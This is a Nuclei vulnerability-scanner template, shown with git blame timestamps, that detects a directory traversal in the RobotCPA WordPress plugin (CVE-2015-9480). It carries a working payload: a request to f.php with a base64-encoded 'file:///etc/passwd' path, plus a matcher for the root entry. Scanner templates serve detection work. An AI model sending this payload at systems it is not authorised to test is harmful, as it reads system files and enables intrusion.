my-nuclei-templates/CVE-2015-9480.yaml

34 lines
848 B
YAML
Raw Permalink Normal View History

2021-07-16 01:28:45 +00:00
id: CVE-2015-9480
info:
2022-06-18 08:05:25 +00:00
name: WordPress RobotCPA 5 - Directory Traversal
2021-07-16 01:28:45 +00:00
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.
2021-09-02 08:03:02 +00:00
reference:
2021-07-16 01:28:45 +00:00
- https://www.exploit-db.com/exploits/37252
2022-06-18 08:05:25 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-9480
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 7.5
2021-09-17 06:03:58 +00:00
cve-id: CVE-2015-9480
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2015,wordpress,wp-plugin,lfi
2021-07-16 01:28:45 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-07-16 01:28:45 +00:00
part: body
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/04/20